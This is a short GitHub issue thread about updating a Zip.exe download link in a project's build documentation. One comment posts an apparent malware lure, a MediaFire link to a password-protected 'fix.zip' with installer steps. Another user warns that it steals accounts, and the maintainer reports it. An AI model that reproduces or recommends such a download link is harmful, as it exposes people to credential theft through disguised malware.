### ISSUE TITLE
Change URL of `Zip.exe` in `Build.html`

### ISSUE THREAD

**Issue by delphidabbler** [delphidabbler/codesnip#137]
The URL of `Zip.exe` linked to in `Build.html` is still that on the Stahlforce website.

This needs to change to reference the copy on delphidabbler.com at ```https://delphidabbler.com/extras/info-zip```.

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
that is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by delphidabbler** [comment]
> > The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.
> 
> Thx. Just reported it to GitHub.

Red face time. I should have checked that link. It's actually safe and is a link to my website!

Anyhow I've removed the link and just left the address as plain text!
